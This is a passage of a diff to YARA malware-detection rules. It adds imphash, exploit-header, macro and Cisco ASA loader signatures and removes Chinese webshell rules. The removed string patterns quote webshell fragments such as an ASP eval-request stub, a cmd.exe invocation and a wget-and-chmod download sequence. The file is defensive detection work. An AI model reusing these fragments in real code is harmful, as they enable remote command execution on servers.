+		hash = "a9897fd2d5401071a8219b05a3e9b74b64ad67ab75044b3e41818e6305a8d7b9"
+		hash = "aeac45fbc5d2a59c9669b9664400aeaf6699d76a57126d2f437833a3437a693e"
+		hash = "7b4c4d4676fab6c009a40d370e6cb53ea4fd73b09c23426fbaccc66d652f2a00"
+		hash = "b07f6873726276842686a6a6845b361068c3f5ce086811db05c1dc2250009cd0"
+		hash = "d1b3afebcacf9dd87034f83d209b42b0d79e66e08c0a897942fbe5fbd6704a0e"
+		hash = "074d52be060751cf213f6d0ead8e9ab1e63f055ae79b5fcbe4dd18469deea12b"
+		hash = "84d1fdef484fa9f637ae3d6820c996f6c5cf455470e8717ad348a3d80d2fb8e0"
+		hash = "437da123e80cfd10be5f08123cd63cfc0dc561e17b0bef861634d60c8a134eda"
+		hash = "f76c36eb22777473b88c6a5fc150fd9d6b5fac5b2db093f0ccd101614c46c7e7"
+		hash = "5498b7995669877a410e1c2b68575ca94e79014075ef5f89f0f1840c70ebf942"
+		hash = "af4e633acfba903e7c92342b114c4af4e694c5cfaea3d9ea468a4d322b60aa85"
+		hash = "d7d870f5afab8d4afa083ea7d7ce6407f88b0f08ca166df1a1d9bdc1a46a41b3"
+		hash = "974209d88747fbba77069bb9afa9e8c09ee37ae233d94c82999d88dfcd297117"
+		hash = "f2d99e7d3c59adf52afe0302b298c7d8ea023e9338c2870f74f11eaa0a332fc4"
+		hash = "b32c93be9320146fc614fafd5e6f1bb8468be83628118a67eb01c878f941ee5d"
+		hash = "bbd99acc750e6457e89acbc5da8b2a63b4ef01d4597d160e9cde5dc8bd04cf74"
+		hash = "dbff5ca3d1e18902317ab9c50be4e172640a8141e09ec13dcca986f2ec1dc395"
+		hash = "3ee1741a649f0b97bbeb05b6f9df97afda22c82e1e870177d8bdd34141ef163c"
+		hash = "222096fc800c8ea2b0e530302306898b691858324dbe5b8357f90407e9665b85"
+		hash = "b9995d1987c4e8b6fb30d255948322cfad9cc212c7f8f4c5db3ac80e23071533"
+		hash = "a6a92ea0f27da1e678c15beb263647de43f68608afe82d6847450f16a11fe6c0"
+		hash = "866e3ea86671a62b677214f07890ddf7e8153bec56455ad083c800e6ab51be37"
+		logic_hash = "dcb4d9a1ca83bbd26178895f20f9ab443f48f42aa3ad3df042c763c24ce8c047"
 		score = 75
 		quality = 85
+		tags = "HIGHVOL, FILE"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
+
+	strings:
+		$fp1 = "Win32 Cabinet Self-Extractor" wide
+		$fp2 = "EXTRACTOPT" ascii fullword
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "9ee34731129f4801db97fd66adbfeaa0" or pe.imphash ( ) == "f9e8597c55008e10a8cdc8a0764d5341" or pe.imphash ( ) == "0a76016a514d8ed3124268734a31e2d2" or pe.imphash ( ) == "d3cbd6e8f81da85f6bf0529e69de9251" or pe.imphash ( ) == "d8b32e731e5438c6329455786e51ab4b" or pe.imphash ( ) == "cdf5bbb8693f29ef22aef04d2a161dd7" or pe.imphash ( ) == "890e522b31701e079a367b89393329e6" or pe.imphash ( ) == "bf5a4aa99e5b160f8521cadd6bfe73b8" or pe.imphash ( ) == "646167cce332c1c252cdcb1839e0cf48" or pe.imphash ( ) == "9f4693fc0c511135129493f2161d1e86" or pe.imphash ( ) == "b4c6fff030479aa3b12625be67bf4914" ) and not 1 of ( $fp* )
+}
+
+rule SIGNATURE_BASE_HKTL_Imphashes_Aug22_1 : FILE
+{
+	meta:
+		description = "Detects different hacktools based on their imphash"
+		author = "Florian Roth"
+		id = "e1d4dde6-16ad-5495-b3a7-01a86c830761"
+		date = "2022-08-17"
+		modified = "2023-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_imphash_detection.yar#L93-L192"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "e76701b889138f9635cfe3a2f08710db3a6f0a3c3a15faa705ff0904d0566a1f"
+		score = 80
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
-		$s2 = "$sCmd = \"convert \".$sFile.\" -flip -quality 80 \".$sFileOut;" fullword ascii
-		$s3 = "$sHash = md5($sURL);" fullword ascii
 
 	condition:
-		filesize < 7KB and 2 of them
+		uint16( 0 ) == 0x5a4d and ( pe.imphash ( ) == "bcca3c247b619dcd13c8cdff5f123932" or pe.imphash ( ) == "3a19059bd7688cb88e70005f18efc439" or pe.imphash ( ) == "bf6223a49e45d99094406777eb6004ba" or pe.imphash ( ) == "0c106686a31bfe2ba931ae1cf6e9dbc6" or pe.imphash ( ) == "0d1447d4b3259b3c2a1d4cfb7ece13c3" or pe.imphash ( ) == "1b0369a1e06271833f78ffa70ffb4eaf" or pe.imphash ( ) == "4c1b52a19748428e51b14c278d0f58e3" or pe.imphash ( ) == "4d927a711f77d62cebd4f322cb57ec6f" or pe.imphash ( ) == "66ee036df5fc1004d9ed5e9a94a1086a" or pe.imphash ( ) == "672b13f4a0b6f27d29065123fe882dfc" or pe.imphash ( ) == "6bbd59cea665c4afcc2814c1327ec91f" or pe.imphash ( ) == "725bb81dc24214f6ecacc0cfb36ad30d" or pe.imphash ( ) == "9528a0e91e28fbb88ad433feabca2456" or pe.imphash ( ) == "9da6d5d77be11712527dcab86df449a3" or pe.imphash ( ) == "a6e01bc1ab89f8d91d9eab72032aae88" or pe.imphash ( ) == "b24c5eddaea4fe50c6a96a2a133521e4" or pe.imphash ( ) == "d21bbc50dcc169d7b4d0f01962793154" or pe.imphash ( ) == "fcc251cceae90d22c392215cc9a2d5d6" or pe.imphash ( ) == "23867a89c2b8fc733be6cf5ef902f2d1" or pe.imphash ( ) == "a37ff327f8d48e8a4d2f757e1b6e70bc" or pe.imphash ( ) == "f9a28c458284584a93b14216308d31bd" or pe.imphash ( ) == "6118619783fc175bc7ebecff0769b46e" or pe.imphash ( ) == "959a83047e80ab68b368fdb3f4c6e4ea" or pe.imphash ( ) == "563233bfa169acc7892451f71ad5850a" or pe.imphash ( ) == "87575cb7a0e0700eb37f2e3668671a08" or pe.imphash ( ) == "13f08707f759af6003837a150a371ba1" or pe.imphash ( ) == "1781f06048a7e58b323f0b9259be798b" or pe.imphash ( ) == "233f85f2d4bc9d6521a6caae11a1e7f5" or pe.imphash ( ) == "24af2584cbf4d60bbe5c6d1b31b3be6d" or pe.imphash ( ) == "632969ddf6dbf4e0f53424b75e4b91f2" or pe.imphash ( ) == "713c29b396b907ed71a72482759ed757" or pe.imphash ( ) == "749a7bb1f0b4c4455949c0b2bf7f9e9f" or pe.imphash ( ) == "8628b2608957a6b0c6330ac3de28ce2e" or pe.imphash ( ) == "8b114550386e31895dfab371e741123d" or pe.imphash ( ) == "94cb940a1a6b65bed4d5a8f849ce9793" or pe.imphash ( ) == "9d68781980370e00e0bd939ee5e6c141" or pe.imphash ( ) == "b18a1401ff8f444056d29450fbc0a6ce" or pe.imphash ( ) == "cb567f9498452721d77a451374955f5f" or pe.imphash ( ) == "730073214094cd328547bf1f72289752" or pe.imphash ( ) == "17b461a082950fc6332228572138b80c" or pe.imphash ( ) == "dc25ee78e2ef4d36faa0badf1e7461c9" or pe.imphash ( ) == "819b19d53ca6736448f9325a85736792" or pe.imphash ( ) == "829da329ce140d873b4a8bde2cbfaa7e" or pe.imphash ( ) == "c547f2e66061a8dffb6f5a3ff63c0a74" or pe.imphash ( ) == "0588081ab0e63ba785938467e1b10cca" or pe.imphash ( ) == "0d9ec08bac6c07d9987dfd0f1506587c" or pe.imphash ( ) == "bc129092b71c89b4d4c8cdf8ea590b29" or pe.imphash ( ) == "4da924cf622d039d58bce71cdf05d242" or pe.imphash ( ) == "e7a3a5c377e2d29324093377d7db1c66" or pe.imphash ( ) == "9a9dbec5c62f0380b4fa5fd31deffedf" or pe.imphash ( ) == "af8a3976ad71e5d5fdfb67ddb8dadfce" or pe.imphash ( ) == "0c477898bbf137bbd6f2a54e3b805ff4" or pe.imphash ( ) == "0ca9f02b537bcea20d4ea5eb1a9fe338" or pe.imphash ( ) == "3ab3655e5a14d4eefc547f4781bf7f9e" or pe.imphash ( ) == "e6f9d5152da699934b30daab206471f6" or pe.imphash ( ) == "3ad59991ccf1d67339b319b15a41b35d" or pe.imphash ( ) == "ffdd59e0318b85a3e480874d9796d872" or pe.imphash ( ) == "0cf479628d7cc1ea25ec7998a92f5051" or pe.imphash ( ) == "07a2d4dcbd6cb2c6a45e6b101f0b6d51" or pe.imphash ( ) == "d6d0f80386e1380d05cb78e871bc72b1" or pe.imphash ( ) == "38d9e015591bbfd4929e0d0f47fa0055" or pe.imphash ( ) == "0e2216679ca6e1094d63322e3412d650" or pe.imphash ( ) == "ada161bf41b8e5e9132858cb54cab5fb" or pe.imphash ( ) == "2a1bc4913cd5ecb0434df07cb675b798" or pe.imphash ( ) == "11083e75553baae21dc89ce8f9a195e4" or pe.imphash ( ) == "a23d29c9e566f2fa8ffbb79267f5df80" or pe.imphash ( ) == "4a07f944a83e8a7c2525efa35dd30e2f" or pe.imphash ( ) == "767637c23bb42cd5d7397cf58b0be688" or pe.imphash ( ) == "14c4e4c72ba075e9069ee67f39188ad8" or pe.imphash ( ) == "3c782813d4afce07bbfc5a9772acdbdc" or pe.imphash ( ) == "7d010c6bb6a3726f327f7e239166d127" or pe.imphash ( ) == "89159ba4dd04e4ce5559f132a9964eb3" or pe.imphash ( ) == "6f33f4a5fc42b8cec7314947bd13f30f" or pe.imphash ( ) == "5834ed4291bdeb928270428ebbaf7604" or pe.imphash ( ) == "5a8a8a43f25485e7ee1b201edcbc7a38" or pe.imphash ( ) == "dc7d30b90b2d8abf664fbed2b1b59894" or pe.imphash ( ) == "41923ea1f824fe63ea5beb84db7a3e74" or pe.imphash ( ) == "3de09703c8e79ed2ca3f01074719906b" or pe.imphash ( ) == "a53a02b997935fd8eedcb5f7abab9b9f" or pe.imphash ( ) == "e96a73c7bf33a464c510ede582318bf2" or pe.imphash ( ) == "32089b8851bbf8bc2d014e9f37288c83" or pe.imphash ( ) == "09D278F9DE118EF09163C6140255C690" or pe.imphash ( ) == "03866661686829d806989e2fc5a72606" or pe.imphash ( ) == "e57401fbdadcd4571ff385ab82bd5d6d" or pe.imphash ( ) == "84B763C45C0E4A3E7CA5548C710DB4EE" or pe.imphash ( ) == "19584675d94829987952432e018d5056" or pe.imphash ( ) == "330768a4f172e10acb6287b87289d83b" )
 }
-rule SIGNATURE_BASE_Tools_2014 : FILE
+
+rule SIGNATURE_BASE_SUSP_Imphash_Mar23_2 : HIGHVOL FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file 2014.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bb76321b-003d-5f6b-a84b-425477abe91c"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L174-L189"
+		description = "Detects imphash often found in malware samples (Zero hits with with search for 'imphash:x p:0' on Virustotal)"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b739d540-5d9f-53b3-9e42-a514dc972e8d"
+		date = "2023-03-23"
+		modified = "2023-11-25"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_imphash_detection.yar#L194-L295"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "74518faf08637c53095697071db09d34dbe8d676"
-		logic_hash = "caa365cc1a641b7dcd5d2082240d981e66caf6da1379ee109a0bb1f651d1f00f"
-		score = 75
+		hash = "12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4"
+		hash = "14ec56489fbcc3c7f1ef9a4d4a80ff302a5e233cdc4429a29c635a88fb1278d6"
+		hash = "13731912823d6ce01c28a8d7d7f961505f461620bb35adbb409d4954ba1f4b8e"
+		hash = "15e59cc5d7b83e63d40dbfd8406701cb4decd31353f68fda47238d073c87e4ea"
+		hash = "13e5bb40be20b1a0bc28081ce7798f339c28c9652cb37b538c29872dfd0cd51d"
+		hash = "16f963afdb30b38ba4b8b98ce56a37626e9fd87de9eba5f9903d2ba7f8a77788"
+		hash = "168f22d02304ce66be88d2370c8fa7c7d9aa2ccf80f8e376edfeabfc9b96c73d"
+		hash = "9e7701450dbcbd35083e34df935bd77a95735c4b441e0fc8eacd543a621f2fa5"
+		hash = "51205c100702b21cce600692d69f3b108f49228e53f36678dd8b39434406526b"
+		hash = "c9b48e8b0e7c6fa75886554659bc0529e454d84b29daa07bd4323aca9a33f607"
+		hash = "ba5c06703bd3c093afa89e45d86aaf6c151fbaef44ebf3b65c97f3b376a88c72"
+		hash = "7281afc138e8e898aee16d415cd02a29dc5dedda5b11c23934aac0ebd208373b"
+		hash = "10a091b2468a8286f7b1a580d8923aef48856b43014e849035f05c4dbdc0a413"
+		hash = "56c04e76427bd982be83799d0a435732193d7bf5a70cdeba5eb63eaf0d4ebb77"
+		hash = "0aa8b7eddc4792a82f247702442c04e50173bd7712a4b596545916480942853b"
+		hash = "627f043ad875c182682149653363b7f856dd618d169821b18df7bc9cdf6269d8"
+		hash = "e1df460fd99c4f901859f3a8ec23b041ba9f4b79897dec349a96d6a27fb3e335"
+		hash = "f10ecbd8031ce85b782c59682ff32301a65e0975687977688771f1057fb063d1"
+		hash = "1bc7b8932b5b077b359c79e7ca664938b7a487a4e7e6b99d6647d6803bc677c5"
+		hash = "01f81029a5e93cbfecfbc81cbd4a2ffd1bb1b6159e2a144a21e58caf8dab9661"
+		hash = "cd33a71f71e2971667bacb0da71f2d36073777993b9581ec90bbf042162c3530"
+		hash = "4aab991149cb2dc8c0c0a323af3acbbd73d6a22177910ef3af92b05ae7c9ae7b"
+		hash = "df05fa3983c9e623388231d366dba4e435575ca53421d3f0bcb0fb346dd971d4"
+		hash = "14de3584fe7108386f7637c2bd343f30341c0fa2102d52bb35ee772b5b7672f0"
+		hash = "c4d9ad5cffd9aa13dfe3acbf0905810e28ff96d231541d7e209327ca5b0b24fe"
+		hash = "5e0bed2269dc34c6cc2db30b0a53282e6debb85b3c90a857d1be4cfd06312211"
+		hash = "3aa13e72382a2d7da592273b8c18a42106b65db528e16b6066646812e81555c4"
+		hash = "244c4a930e3644ffb96bf3ab33e8c8c0f94ed9fe6a8b2fc45fc8e9b6471ef3a8"
+		hash = "f00848b8edeeb5a668bf7e89e3f33f438b2f5d5cf130596a8ed2531e21be6d81"
+		hash = "5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e"
+		logic_hash = "c6482cbc01a880ffd3056d28a2fde8f87402b1f85d36075c1f0b50788d469ca3"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "((Invoker) ins.get(\"login\")).invoke(request, response," fullword ascii
-		$s4 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
-		$s5 = ": \"c:\\\\windows\\\\system32\\\\cmd.exe\")" fullword ascii
+		tags = "HIGHVOL, FILE"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
 
 	condition:
-		filesize < 715KB and all of them
+		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "e4290fa6afc89d56616f34ebbd0b1f2c" or pe.imphash ( ) == "8abecba2211e61763c4c9ffcaa13369e" or pe.imphash ( ) == "a64e048b98d051ae6e6b6334f77c95d3" or pe.imphash ( ) == "359d89624a26d1e756c3e9d6782d6eb0" or pe.imphash ( ) == "c2a87fabf96470db507b2e6b43bd92eb" or pe.imphash ( ) == "62ec3dce1eba1b68f6a4511bb09f8c2c" or pe.imphash ( ) == "5662cfcdfd9da29cb429e7528d5af81e" or pe.imphash ( ) == "406c785a6e2c6970c1e8ed62877e197b" or pe.imphash ( ) == "dbf687d6aa2a6cafe4349f7b0821a792" or pe.imphash ( ) == "6dca3e9fb3928bbdb54dbce669943ec8" or pe.imphash ( ) == "f1a539a5b71ad53ac586f053145f08ec" or pe.imphash ( ) == "3a2003ea545fe942681da9e7683ebb58" or pe.imphash ( ) == "a8286b574ff850cd002ea6282d15aa40" or pe.imphash ( ) == "3c8577ca4bab2f95cc6fc73ef1895288" or pe.imphash ( ) == "84706849fa809feaa385711a628be029" or pe.imphash ( ) == "ba23a556ac1d6444f7f76feafd6c8867" or pe.imphash ( ) == "95e6f8741083e0c7d9a63d45e2472360" or pe.imphash ( ) == "774d797db707398fd2ef1979d02634d5" or pe.imphash ( ) == "8c16c795b57934183422be5f6df7d891" or pe.imphash ( ) == "98f67c550a7da65513e63ffd998f6b2e" or pe.imphash ( ) == "e836076a09dba03e4d6faa46dda0fefc" or pe.imphash ( ) == "ff63dc9c65eb25911a9bc535c8f06ad0" or pe.imphash ( ) == "08b67a9663d3a8c9505f3b2561bbdd1c" or pe.imphash ( ) == "135e92fc9902f3140f2e5a51458efdf0" or pe.imphash ( ) == "4753904c40d638a1bc745c65b88291d5" or pe.imphash ( ) == "0f44bf2b3b0b8d5ecae5689ff1d0e90d" or pe.imphash ( ) == "c4c9ecfc26ca516a80b8f6f5b2bdb7e6" or pe.imphash ( ) == "46ad3d954e527f769e37017b3e128039" or pe.imphash ( ) == "802dcac7aab948c19738ba3df9f356d9" or pe.imphash ( ) == "b36a21279375c40e6f4c1ea347f906de" or pe.imphash ( ) == "77a185e903c5527243ef219b003bfd38" or pe.imphash ( ) == "12a30b523ac71a3cbe9145c89400dd7f" or pe.imphash ( ) == "cc40fefa3af5cd00cc28dbd874038a4d" or pe.imphash ( ) == "3d8c26f4cb1782a87c3bb42796fb6b85" or pe.imphash ( ) == "2f4ddcfebbcad3bacadc879747151f6f" or pe.imphash ( ) == "76812f441b0ed9d3cc0748af25d689a3" or pe.imphash ( ) == "9a06f0024c1694774ae97311608bab5b" or pe.imphash ( ) == "481f47bbb2c9c21e108d65f52b04c448" or pe.imphash ( ) == "286870a926664a5129b8b68ed0d4a8eb" or pe.imphash ( ) == "a0db151d55761167d93eba72d3d94b32" or pe.imphash ( ) == "663243fe4d94e1304b265ce4011cd01b" or pe.imphash ( ) == "f24e64014af9015dc25262e5076fe61f" or pe.imphash ( ) == "b7d08302c927428e16a2ad8d18b9d2b7" or pe.imphash ( ) == "352063077f27a851dc2b08e15f08105e" or pe.imphash ( ) == "b0b97d1a91a2730b3daa8bbb2e86b402" or pe.imphash ( ) == "bc96f1c981700752dc2cf9553da99eb6" or pe.imphash ( ) == "f68ddef5f29b66bbd543e947c8743bb0" or pe.imphash ( ) == "6dfbc160505aa2f7205766eaa6fe72a1" or pe.imphash ( ) == "a202429ffe8d8c8b722572cffd5681a7" or pe.imphash ( ) == "342a3708d93b6b819b7b1a768201a747" or pe.imphash ( ) == "cdc00badc7162acde9bb032e793ac137" or pe.imphash ( ) == "be19e18d6a8b41631d40059031a928bb" or pe.imphash ( ) == "0c54f96a844b02689687407de9b6663e" or pe.imphash ( ) == "fa5f28e70130a452b7c0a51db5544ef9" or pe.imphash ( ) == "2e5708ae5fed0403e8117c645fb23e5b" or pe.imphash ( ) == "8d92fa1956a6a631c642190121740197" or pe.imphash ( ) == "dc73a9bd8de0fd640549c85ac4089b87" )
 }
-rule SIGNATURE_BASE_Reduhservers_Reduh_2 : FILE
+
+rule SIGNATURE_BASE_SUSP_Imphash_Mar23_3 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file reDuh.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6050dfde-6c79-5dd8-a772-508668177aa5"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L191-L206"
+		description = "Detects imphash often found in malware samples (Maximum 0,25% hits with search for 'imphash:x p:0' on Virustotal) = 99,75% hits"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "eb91e700-6478-5085-a393-a7b342c0eb4f"
+		date = "2023-03-23"
+		modified = "2023-07-24"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_imphash_detection.yar#L297-L329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "512d0a3e7bb7056338ad0167f485a8a6fa1532a3"
-		logic_hash = "954115da374b6d72c35244673799be6e8bae5288f53509dea04e3ae3c489af12"
-		score = 75
+		hash = "b5296cf0eb22fba6e2f68d0c9de9ef7845f330f7c611a0d60007aa87e270c62a"
+		hash = "5a5a5f71c2270cea036cd408cde99f4ebf5e04a751c558650f5cb23279babe6d"
+		hash = "481b0d9759bfd209251eccb1848048ebbe7bd2c87c5914a894a5bffc0d1d67ff"
+		hash = "716ba6ea691d6a391daedf09ae1262f1dc1591df85292bff52ad76611666092d"
+		hash = "800d160736335aafab10503f7263f9af37a15db3e88e41082d50f68d0ad2dabd"
+		hash = "416155124784b3c374137befec9330cd56908e0e32c70312afa16f8220627a52"
+		hash = "21899e226502fe63b066c51d76869c4ec5dbd03570551cea657d1dd5c97e7070"
+		hash = "0461830e811d3831818dac5a67d4df736b4dc2e8fb185da439f9338bdb9f69c3"
+		hash = "773edc71d52361454156dfd802ebaba2bb97421ce9024a7798dcdee3da747112"
+		hash = "fe53b9d820adf3bcddf42976b8af1411e87d9dfd9aa479f12b2db50a5600f348"
+		logic_hash = "f11de8b7f78cdfc79116670409c31745e2803ef8b8e97d08be012f1146b3d816"
+		score = 45
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "errorlog(\"FRONTEND: send_command '\".$data.\"' on port \".$port.\" returned \"." ascii
-		$s2 = "$msg = \"newData:\".$socketNumber.\":\".$targetHost.\":\".$targetPort.\":\".$seq" ascii
-		$s3 = "errorlog(\"BACKEND: *** Socket key is \".$sockkey);" fullword ascii
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
 
 	condition:
-		filesize < 57KB and all of them
+		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "afcdf79be1557326c854b6e20cb900a7" or pe.imphash ( ) == "6ed4f5f04d62b18d96b26d6db7c18840" or pe.imphash ( ) == "fc6683d30d9f25244a50fd5357825e79" or pe.imphash ( ) == "2c5f2513605e48f2d8ea5440a870cb9e" or pe.imphash ( ) == "0b5552dccd9d0a834cea55c0c8fc05be" ) and pe.number_of_signatures == 0
 }
-rule SIGNATURE_BASE_Customize_2 : FILE
+rule SIGNATURE_BASE_EXPL_CVE_2021_31166_Accept_Encoding_May21_1 : CVE_2021_31166
 {
 	meta:
-		description = "Chinese Hacktool Set - file Customize.jsp"
+		description = "Detects malformed Accept-Encoding header field as used in code exploiting CVE-2021-31166"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1f7e9063-33d8-5df4-89d5-7d8fc1be61f0"
-		date = "2015-06-13"
+		id = "d0a79cdc-f3ee-58f9-805c-ec9eb7993315"
+		date = "2021-05-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L208-L222"
+		reference = "https://github.com/0vercl0k/CVE-2021-31166"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2021_31166.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "37cd17543e14109d3785093e150652032a85d734"
-		logic_hash = "aa0940a21eea6ba50a93dd36a8f914f636fdba0685048fc67e16dd68c1c2794e"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "5bb5b4093a7abe9d4297a4c047803b92f7c08f56f15b0f7bd163203ae47e026d"
+		score = 70
+		quality = 60
+		tags = "CVE-2021-31166"
 
 	strings:
-		$s1 = "while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}}" fullword ascii
-		$s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
+		$xr1 = /[Aa]ccept\-[Ee]ncoding: [a-z\-]{1,16},([a-z\-\s]{1,16},|)*[\s]{1,20},/
 
 	condition:
-		filesize < 30KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Chinachopper_One : FILE
+rule SIGNATURE_BASE_SUSP_Maldoc_Excelmacro : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file one.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "854fb5c9-38c7-5fd2-a473-66ae297070f5"
-		date = "2015-06-13"
+		description = "Detects malicious Excel macro Artifacts"
+		author = "James Quinn"
+		id = "76806717-a9a8-520e-b6b6-7718eb088de5"
+		date = "2020-11-03"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L224-L237"
+		reference = "YARA Exchange - Undisclosed Macro Builder"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_macro_builders.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6cd28163be831a58223820e7abe43d5eacb14109"
-		logic_hash = "f9a6e4b8556eb3f1e1cbe0bc4eb225b9564ac59aae4a97f184806c6bec95578d"
-		score = 75
+		logic_hash = "c5d0655eaf2ca36c828675f9673a1d4284ef8719fd9ec1d354ee3284d1fb0a0c"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%eval request(" ascii
+		$artifact1 = {5c 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2e 00 ?? 00 ?? 00}
+		$url1 = "http://" wide
+		$url2 = "https://" wide
+		$import1 = "URLDownloadToFileA" wide ascii
+		$macro = "xl/macrosheets/"
 
 	condition:
-		filesize < 50 and all of them
+		uint16( 0 ) == 0x4b50 and filesize < 2000KB and $artifact1 and $macro and $import1 and 1 of ( $url* )
 }
-rule SIGNATURE_BASE_CN_Tools_Old : FILE
+rule SIGNATURE_BASE_Line_Dancer
 {
 	meta:
-		description = "Chinese Hacktool Set - file old.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bfdb84e8-e5a8-53a4-ae71-e0d1b38d38ef"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L239-L255"
+		description = "Targets code sections of Line Dancer, a shellcode loader targeting Cisco ASA devices."
+		author = "NCSC"
+		id = "3b49a861-8107-577a-bae1-ae28d424cc13"
+		date = "2024-04-24"
+		modified = "2024-04-29"
+		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/line/ncsc-tip-line-dancer.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cisco_asa_line_dancer_apr24.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f8a007758fda8aa1c0af3c43f3d7e3186a9ff307"
-		logic_hash = "3f0ac357e9a9fb4ee937b53145b33ba1041310d979cbc3feb0a4caf026b9b730"
+		logic_hash = "179e58274a792bc4a16787d251f5ad25de1271084323e62e153fa6d461e3c07e"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
-		$s1 = "$sURL = \"http://\".$sServer.\"/\".$sFile;" fullword ascii
-		$s2 = "chmod(\"/\".substr($sHash, 0, 2), 0777);" fullword ascii
-		$s3 = "$sCmd = \"echo 123> \".$sFileOut;" fullword ascii
+		$ = { 48 8D 5E 20 48 8D 3D BB FF FF FF BA 20 00 00 00 }
+		$ = { 4C 89 EE 44 89 F2 48 8D 3D 9A 27 00 00 }
+		$ = { 41 FF D7 41 5F 41 5E 41 5D 41 5C 5B 5D 48 C7 C0 01 00 00 00 5F }
 
 	condition:
-		filesize < 6KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Item_301 : FILE
+rule SIGNATURE_BASE_Gen_Unicorn_Obfuscated_Powershell : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file item-301.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4ee9a089-313f-53c1-8196-1348d721dbf4"
-		date = "2015-06-13"
+		description = "PowerShell payload obfuscated by Unicorn toolkit"
